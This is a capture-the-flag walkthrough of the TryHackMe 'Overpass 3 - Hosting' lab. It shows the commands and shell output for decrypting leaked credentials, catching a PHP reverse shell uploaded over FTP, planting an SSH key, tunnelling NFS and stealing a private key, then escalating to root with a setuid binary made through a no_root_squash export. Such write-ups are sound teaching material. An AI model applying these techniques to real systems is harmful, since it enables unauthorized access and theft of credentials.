TryHackMe - Overpass 3 - Hosting

TryHackMe - Overpass 3 - Hosting

This is the third, and last, installment in the overpass series on TryHackMe. I did part 1, and part 2, though I never wrote up how I did part 2. I don't know if I'll go back and write that one up or not.

Ports

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.0 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.37 ((centos))
Service Info: OS: Unix

Port 80

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://$IP

backups.zip has a file encrypted with Gnu Privacy Guard, but also the private key.

gpg --import priv.key
gpg --decrypt CustomerDetails.xlsx.gpg > CustomerDetails.xlsx

The CustomerDetails.xlsx has a list of usernames and passwords.

Port 21

With the credentials we found in backups.zip, let's try FTP:

As paradox:

150 Here comes the directory listing.
drwxr-xr-x    2 48       48             24 Nov 08  2020 backups
-rw-r--r--    1 0        0           65591 Nov 17  2020 hallway.jpg
-rw-r--r--    1 0        0            1770 Nov 17  2020 index.html
-rw-r--r--    1 0        0             576 Nov 17  2020 main.css
-rw-r--r--    1 0        0            2511 Nov 17  2020 overpass.svg

This user can upload files, including php, verified first by

<?php phpinfo(); ?>

Port 22

We can't just ssh to the box (yet), even with username password, because it requires keys:

➜  overpass3hosting git:(main) ✗ ssh paradox@$IP
paradox@10.10.40.32: Permission denied (publickey,gssapi-keyex,gssapi-with-mic).

Initial Shell

Upload a php reverse shell via FTP and listen for the callback:

listening on [any] 4444 ...
10.10.22.22: inverse host lookup failed: Unknown host
connect to [10.2.7.89] from (UNKNOWN) [10.10.22.22] 59194
Linux ip-10-10-22-22 4.18.0-193.el8.x86_64 #1 SMP Fri May 8 10:59:10 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 06:34:55 up 46 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh-4.4$ uname -a
uname -a
Linux ip-10-10-22-22 4.18.0-193.el8.x86_64 #1 SMP Fri May 8 10:59:10 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
CentOS Linux release 8.2.2004 (Core)

Oh, neato, an NFS export with no_root_squash. With this, root on a remote client accesses the files on the server as root! Read more here.

Connected NFS Mounts:
nfsd /proc/fs/nfsd nfsd rw,relatime 0 0
sunrpc /var/lib/nfs/rpc_pipefs rpc_pipefs rw,relatime 0 0
-rw-r--r--. 1 root root 54 Nov 18  2020 /etc/exports
/home/james *(rw,fsid=0,sync,no_root_squash,insecure)

web.flag

The first flag was sitting in /usr/share/httpd, probably because with the shell we are apache at the moment.

cd ~
sh-4.4$ pwd
/usr/share/httpd
pwd
sh-4.4$ ls
ls
error
icons
noindex
web.flag
sh-4.4$ cat web.flag
cat web.flag
thm{********************************}

Persistence

Ok, the apache user is pretty limited, let's see if we can switch to paradox using the same password we found earlier:

listening on [any] 4444 ...
10.10.40.32: inverse host lookup failed: Unknown host
connect to [10.2.7.89] from (UNKNOWN) [10.10.40.32] 34748
Linux ip-10-10-40-32 4.18.0-193.el8.x86_64 #1 SMP Fri May 8 10:59:10 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 17:21:10 up 6 min,  0 users,  load average: 0.00, 0.15, 0.10
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: cannot set terminal process group (889): Inappropriate ioctl for device
sh: no job control in this shell
sh-4.4$ /usr/bin/python3 -c 'import pty; pty.spawn("/bin/bash")'
/usr/bin/python3 -c 'import pty; pty.spawn("/bin/bash")'
bash-4.4$ su paradox
su paradox
Password: *****************

[paradox@ip-10-10-40-32 /]$ cd ~
icd ~
[paradox@ip-10-10-40-32 ~]$ d
id
uid=1001(paradox) gid=1001(paradox) groups=1001(paradox)

Nice. We couldn't ssh to the box as that user before because they're configured to only allow ssh with a key, not password. So let's add a key of ours to authorized keys so we can just ssh in as paradox from here on.

cat 'ssh-rsa AAAAB3N ... blah blah redacted' >> ~/.ssh/authorized_keys

NFS

The nfs ports, 111 and 2049 show up as filtered on an nmap scan, so we cannot directly mount the exported filesystem. But now that we can use ssh as paradox, we can just forward the ports!

Attacker

ssh -i id_rsa -N -L 10.2.7.89:2049:$IP:2049 -L 10.2.7.89:111:$IP:111 paradox@10.10.22.22

user.flag

Now we can mount the exported path locally and read/write at will.

Attacker: mount the remote path via nfs, but use our IP address because we are tunneling

➜  overpass3hosting git:(main) ✗ sudo mount -t nfs 10.2.7.89: ./james
[sudo] password for beamjack: 
➜  overpass3hosting git:(main) ✗ cd james
➜  james ls -la
total 20
drwx------ 3 beamjack beamjack  112 Nov 17  2020 .
drwxr-xr-x 3 beamjack beamjack 4096 Oct 23 00:18 ..
lrwxrwxrwx 1 root     root        9 Nov  8  2020 .bash_history -> /dev/null
-rw-r--r-- 1 beamjack beamjack   18 Nov  8  2019 .bash_logout
-rw-r--r-- 1 beamjack beamjack  141 Nov  8  2019 .bash_profile
-rw-r--r-- 1 beamjack beamjack  312 Nov  8  2019 .bashrc
drwx------ 2 beamjack beamjack   61 Nov  7  2020 .ssh
-rw------- 1 beamjack beamjack   38 Nov 17  2020 user.flag

➜  james cat user.flag
thm{********************************}

We can similarly steal james' keys for ssh

➜  james cp .ssh/id_rsa ../james_rsa 
➜  james cd ..
➜  overpass3hosting git:(main) ✗ ssh -i james_rsa james@$IP
Last login: Wed Nov 18 18:26:00 2020 from 192.168.170.145
[james@ip-10-10-40-32 ~]$ id
uid=1000(james) gid=1000(james) groups=1000(james)

root.flag

Remember that no_squash_root flag on the export? Well that means if we are root on the machine that mounts the export, we can write things as root in that mounted filesystem. We could put our own binary there and setuid, but let's just use a binary already on the target since we just want to grab the flag. We could try bash, but I'm fairly sure that bash will drop its effective user to unprivileged, and we just want to grab the flag for a CTF. How about we setuid cat and then run it on the target box?

Target: As james, copy the local cat binary to this directory

[james@ip-10-10-40-32 ~]$ cp /usr/bin/cat .

Attacker: with the target filesystem mounted, chown and chmod the binary as root (yes, root on our attacker system, remember no_root_squash)

➜  james sudo chown root ./cat
➜  james ls -la ./cat
-rwxr-xr-x 1 root     beamjack 87496 Oct 23 10:37 cat
➜  james sudo chmod u+s ./cat
➜  james ls -la ./cat
-rwsr-xr-x 1 root beamjack 87496 Oct 23 10:37 ./cat

Target: run the binary that has setuid so it runs with root privileges

[james@ip-10-10-40-32 ~]$ ./cat /root/root.flag
thm{********************************}